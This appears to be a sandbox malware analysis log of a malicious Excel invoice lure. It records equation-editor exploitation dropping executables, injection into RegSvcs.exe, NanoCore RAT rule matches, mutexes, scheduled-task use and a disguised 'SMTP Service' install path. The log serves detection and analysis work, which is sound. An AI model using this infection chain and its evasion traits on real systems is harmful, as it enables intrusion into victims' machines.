          Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D088E NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D1E96 NtQuerySystemInformation,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D086C NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D1E63 NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F144A NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F140F NtQuerySystemInformation,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_011D85C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E8418
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6C48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E4450
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EED58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6550
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E75A8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E55D9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EDA30
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5210
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5260
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA739
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E4790
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EDCC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB179
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9170
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA571
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA140
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA150
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9180
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA580
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5980
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE268
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA339
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA348
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9BB0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9BC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B71078
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B739B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B72FB8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B743A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B71500
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B73368
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B706C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B706C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B70070
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B71798
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B71789
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B74770
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B7497E
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00B74967
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0A28
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C2418
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003CB410
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C38C8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C8AE8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C3020
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C9807
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C30E7
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C9740
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: nano[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nano[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nano[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: gmSlQSien.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: gmSlQSien.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: gmSlQSien.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: nano[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: gmSlQSien.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/29@15/2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D053E AdjustTokenPrivileges,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_006D0507 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F10DA AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_004F10A3 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\NFKnYlgkNzhyGKSdXXNN
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE04.tmpJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................#.............h.#.....(.P.....h...............(...............................................................................
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxVirustotal: Detection: 29%
          Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxReversingLabs: Detection: 22%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
